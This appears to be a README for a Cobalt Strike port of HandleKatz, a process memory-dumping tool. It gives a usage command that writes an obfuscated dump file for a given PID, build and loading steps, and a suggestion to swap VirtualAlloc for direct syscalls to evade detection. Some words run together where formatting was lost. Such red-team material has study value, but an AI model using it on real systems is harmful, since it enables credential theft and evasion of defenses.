This is a (mostly complete) port of the functionality presented by @thefLink and Code White GmbH. You guys deserve a large amount of thanks for taking the time to present your research!
This was a personal question to answer if this would work within Cobalt Strike, and if so, how?
- There are two required parameters, a
PIDand a filepath to write the dumpfile to. (e.g.handlekatz 780 C:\Users\User\Desktop\obfuscated.dmp)
- In this case, you have two options:
- Use the existing, compiled object file, located in the
distdirectory (AKA proceed to major step two) - Compile from source via the
Makefilecd srcmake cleanmake
- Use the existing, compiled object file, located in the
- Load the
Aggressorfile, in theScript Manager, located in thedistdirectory
- We're still using the
Win32API andDynamic Function Resolution. This is for you to determine as far as "risk" - You may attempt to incur a privileged action without sufficient requisite permissions. I can't keep you from burning your hand.
- Implement the one remaining overt
Win32 APIcall invoked with theDynamic Function Resolutionsyntax (VirtualAlloc) to be a call toNtAllocateVirtualMemory. I've included the necessary header(s) with implementation insyscalls.h. Enjoy! :)